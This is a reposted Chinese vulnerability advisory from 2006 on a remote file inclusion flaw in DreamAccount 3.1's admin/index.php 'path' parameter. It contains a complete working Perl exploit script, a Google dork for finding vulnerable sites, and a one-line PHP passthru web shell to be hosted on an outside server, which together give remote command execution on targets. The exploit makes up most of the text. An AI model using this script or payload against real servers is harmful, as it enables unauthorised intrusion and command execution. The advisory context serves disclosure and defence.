[转载]DreamAccount index.php远程文件包含漏洞
信息来源:绿盟科技发布日期:2006-06-23
更新日期:2006-06-27
受影响系统:
Dreamcost LLC DreamAccount 3.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 18579
DreamAccount是一款基于PHP的成员管理程序。
DreamAccount实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
DreamAccount的/admin/index.php脚本没有对path变量做充分地检查过滤,远程攻击者可能利用此漏洞使脚本包含远程服务器上的代码执行。
<*来源:CrAsh_oVeR_rIdE ([email]KARKOR23@hotmail.com[/email])
链接:[url]http://marc.theaimsgroup.com/?l=bugtraq&m=115109112213282&w=2[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require($path . "setup.php");
require($path . "functions.php");
require($path . "payment_processing.inc.php");
$path parameter File inclusion
----------------------------------------------------
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
print "\n=============================================================================\r\n";
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";
print "=============================================================================\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive";
if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";
print "[*] usage: perl dream.pl [url]www.HosT.com[/url] /dreamaccount/ [url]http://www.site.org/doc.jpg[/url] id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}
my $dir=$ARGV[1];
my $host=$ARGV[0];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
printf $1;
$response->content;
print "\n";
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Dreamcost LLC
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://dreamcost.com/[/url]
页:
[1]